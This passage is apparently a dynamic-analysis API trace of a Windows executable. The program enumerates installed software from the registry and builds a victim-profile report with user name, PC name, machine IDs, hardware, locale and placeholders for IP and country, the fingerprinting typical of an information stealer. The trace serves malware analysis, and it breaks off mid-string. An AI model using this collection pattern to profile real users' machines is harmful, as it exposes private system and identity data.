lpName="{65e650ff-30be-469d-b63a-418d71ea1765}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.107] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{65e650ff-30be-469d-b63a-418d71ea1765}") returned 94 [0208.107] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{65e650ff-30be-469d-b63a-418d71ea1765}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.107] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508", lpcbData=0x19ce18*=0x43) returned 0x0 [0208.107] lstrlenA (lpString="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508") returned 66 [0208.107] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\n", lpString2="Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508" [0208.107] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="14.25.28508.3", lpcbData=0x19ce18*=0xe) returned 0x0 [0208.108] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 " [0208.108] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 ", lpString2="14.25.28508.3" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3" [0208.108] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3", lpString2="\n" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\n") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\n" [0208.108] RegCloseKey (hKey=0x3a4) returned 0x0 [0208.108] RegEnumKeyExA (in: hKey=0x3a8, dwIndex=0x1a, lpName=0x19d228, lpcchName=0x19ce18, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="{6913e92a-b64e-41c9-a5e6-cef39207fe89}", lpcchName=0x19ce18, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0208.108] wsprintfA (in: param_1=0x19ce28, param_2="%s\\%s" | out: param_1="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}") returned 94 [0208.108] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\{6913e92a-b64e-41c9-a5e6-cef39207fe89}", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ce24 | out: phkResult=0x19ce24*=0x3a4) returned 0x0 [0208.108] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayName", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508", lpcbData=0x19ce18*=0x43) returned 0x0 [0208.108] lstrlenA (lpString="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508") returned 66 [0208.108] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\n", lpString2="Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508" | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508" [0208.108] RegQueryValueExA (in: hKey=0x3a4, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0x19d62c, lpData=0x19ca18, lpcbData=0x19ce18*=0x400 | out: lpType=0x19d62c*=0x1, lpData="14.25.28508.3", lpcbData=0x19ce18*=0xe) returned 0x0 [0208.108] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508", lpString2=" " | out: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 ") returned="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 11.0.61030.0\nMicrosoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0\nMicrosoft Visual C++ 2015-2019 Redistributable (x86) - 14.25.28508 14.25.28508.3\nMicrosoft Visual C++ 2015-2019 Redistributable (x64) - 14.25.28508 " [0208.109] lstrcatA (in: lpString1="Tag: Default\n\nIP: IP?\nCountry: Country?\n\nWorking Path: C:\\Users\\RDhJ0CNFevzX\\Desktop\\977a8d56d7bbc22e780e85bea06fa4be13c8f9be01515665863cb431fb2e8daa.exe\n\nLocal Time: 13/9/2021 16:7:2\nTimeZone: UTC1\n\nDisplay Language: en-US\nKeyboard Languages: English (United States)\n\nIs Laptop: No\nProcessor: Intel(R) Core(TM) i5-7500 CPU @ 3.40GHz\nInstalled RAM: 4096 MB\nOS: Windows 10 Pro (x64 Bit)\nVideocard: Microsoft Basic Display Adapter\nDisplay Resolution: 1440x900\n\nPC name: XC64ZB\nUser name: RDhJ0CNFevzX\nDomain name: ?\nMachineID: 03845cb8-7441-4a2f-8c0f-c90408af5778\nGUID: {c20d559d-6c9d-11eb-b0a3-806e6f6e6963}\n\nInstalled Software: \nMicrosoft Visual C++ 2019 X86 Additional Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 12.0.21005\nMicrosoft Visual C++ 2019 X86 Minimum Runtime - 14.25.28508 14.25.28508\nMicrosoft Visual C++ 2012 Redistributable (x86) - 